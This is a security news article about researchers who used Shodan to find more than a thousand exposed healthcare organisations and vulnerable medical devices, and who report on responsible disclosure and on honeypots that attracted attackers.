Too many vulnerable medical systems can be found online
How many critical medical systems can be found on the Internet, accessible to and hackable by remote attackers? According to security researchers Scott Erven and Mark Collao, too many.
Erven, an associate director for consulting firm Protiviti’s who’s focused on healthcare IT security, and Collao, a security consultant at Neohapsis, have used Shodan, a search engine for Internet-connected devices, to discover medical devices that might be exposed to attack.
They found many: radiology equipment, anaesthesia systems, cardiology equipment, and so on. A Shodan search for “anaesthesia” also revealed a public facing system that was not an anaesthesia workstation, but a misconfigured external system that was leaking intelligence about the healthcare organization’s entire network – including the medical devices.
The number of exposed healthcare organizations they found was over a thousand. One particular large US healthcare system exposed intelligence on over 68,000 systems and provided direct attack vectors to them. Among these were 21 anaesthesia, 488 cardiology, 133 infusion, 323 PACS, 31 pacemaker, 67 nuclear medicine systems, and 97 MRI scanners.
They were able to collect information about the organization that would allow attackers to perform both physical and pivot attacks (the latter by exploiting an old XP vulnerability in the Internet-facing system, then use the foothold to reach backend networks and medical devices with known vulnerabilities).
The vulnerabilities found are usually weak default/hardcoded admin login credentials, unencrypted data transmission and service authorization flaws, and known software vulnerabilities in legacy devices that are not getting update nor patched.
Erven shared a number of vulnerabilities he found in medical systems in the last year (and responsibly disclosed to manufacturers), and praised General Electric for their prompt response and great collaboration with security researchers.
Finally, they shared their attempt to see who would target these systems and with what goal in mind, so they set up ten realistic honeypots and waited for trespassers. They had over 55,000 successful SSH/Web logins, 24 successful exploits of vulnerabilities, and the miscreants dropped nearly 300 malware samples. The top three countries from which the attacks came were the Netherlands, China and Korea.
The good news is that the attackers usually do nothing once they are in the system – most, if not all, probably don’t even realize what kind of system they gained root to. They would drop a malicious payload to gain persistence in the system, and made it call back to a C&C server.
Still, the C&C owners are not aware what kind of information they might have access to. There is no evidence of intentional targeted attacks – yet.
But there is no doubt that things should change if we want to assure the patients’ safety as well as privacy. In the meantime, organizations should check their device for default credentials and vulnerabilities, and demand fixes from manufacturers.